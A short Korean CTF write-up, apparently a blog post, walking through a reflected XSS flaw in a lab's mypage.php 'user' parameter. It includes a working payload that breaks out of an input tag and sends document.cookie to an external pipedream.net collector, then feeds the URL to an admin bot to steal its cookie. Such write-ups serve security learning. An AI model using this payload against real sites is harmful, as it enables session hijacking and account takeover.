[CTF] XSS 3

CHIKA·2024년 6월 30일

📌
XSS (Cross Site Scripting)
Cookie 탈취

취약점 설명 : Reflected XSS
취약점 발생 위치 : mypage.php

회원가입 & 로그인후 마이페이지.

파라미터로 user 값이 오고있으니 조작해보자.

입력값으로 바뀐다.

특수문자 삽입가능 여부를 확인하기 위해 test<'">을 넣어본다.

꺽쇠 삽입이 가능하다.

스크립트 작동여부를 확인하기 위해 alert(1)먼저 출력해보자.
꺽쇠 삽입이 가능하므로 input 태그를 막고 script를 넣자.
URL에서 user뒤에

xcvb"/><script>alert(1)</script>

를 입력한다.

alert창 출력!

쿠키탈취 코드를 넣어보자
공격자 서버는 https://en2hyoic3j7mi.x.pipedream.net/ 이다.
URL에서 user뒤에

xcvb"/><script>var cookieData =document.cookie;var i =new Image(); i.src = `https://en2hyoic3j7mi.x.pipedream.net/?cookie=${cookieData}`;</script>

를 입력.

쿠키값이 넘어오고 있다.
해당 URL을 관리자 봇에 입력하자.

쿠키 탈취 성공!